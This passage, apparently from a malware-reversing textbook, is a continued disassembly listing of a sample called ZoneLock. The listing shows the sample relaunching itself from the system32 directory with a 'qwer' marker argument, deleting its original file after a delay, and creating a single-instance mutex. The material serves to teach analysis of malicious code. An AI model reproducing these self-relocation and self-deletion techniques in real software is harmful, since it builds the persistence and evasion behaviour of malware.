ZoneLockup.exe”
004026FF PUSH ZoneLock.0040553D ; format = “qwer%s”
00402704 LEA EAX,DWORD PTR SS:[EBP-29C]
0040270A PUSH EAX ; s
0040270B CALL <JMP.&CRTDLL.sprintf>
00402710 ADD ESP,0C
00402713 PUSH 5 ; IsShown = 5
00402715 PUSH 0 ; DefDir = NULL
00402717 LEA EAX,DWORD PTR SS:[EBP-29C]
0040271D PUSH EAX ; Parameters
0040271E PUSH ZoneLock.00404010 ; FileName = “C:\WINNT\system32”
00402723 PUSH ZoneLock.00405696 ; Operation = “open”
00402728 PUSH 0 ; hWnd = NULL
0040272A CALL <JMP.&SHELL32.ShellExecuteA>
0040272F PUSH 0 ; ExitCode = 0
00402731 CALL <JMP.&KERNEL32.ExitProcess>
00402736 CALL <JMP.&KERNEL32.GetCommandLineA>
0040273B PUSH ZoneLock.00405538 ; s2 = “qwer”
00402740 PUSH EAX ; s1
00402741 CALL <JMP.&CRTDLL.strstr>
00402746 ADD ESP,8
00402749 MOV ESI,EAX
0040274B OR ESI,ESI
0040274D JE SHORT ZoneLock.00402775
0040274F MOV ECX,ESI
00402751 OR EAX,FFFFFFFF
00402754 INC EAX
00402755 CMP BYTE PTR DS:[ECX+EAX],0
00402759 JNZ SHORT ZoneLock.00402754
0040275B CMP EAX,8
0040275E JBE SHORT ZoneLock.00402775
00402760 PUSH 7D0 ; Timeout = 2000. ms
00402765 CALL <JMP.&KERNEL32.Sleep>
0040276A MOV EAX,ESI
0040276C ADD EAX,4
0040276F PUSH EAX ; FileName
00402770 CALL <JMP.&KERNEL32.DeleteFileA>
00402775 PUSH ZoneLock.004050A3 ; MutexName = “botsmfdutpex”
0040277A PUSH 1 ; InitialOwner = TRUE
0040277C PUSH 0 ; pSecurity = NULL
0040277E CALL <JMP.&KERNEL32.CreateMutexA>
00402783 MOV DWORD PTR DS:[404650],EAX
00402788 CALL <JMP.&KERNEL32.GetLastError>
0040278D CMP EAX,0B7
00402792 JNZ SHORT ZoneLock.0040279B
00402794 PUSH 0 ; ExitCode = 0
00402796 CALL <JMP.&KERNEL32.ExitProcess>Listing 8.3 (continued)
Reversing Malware 293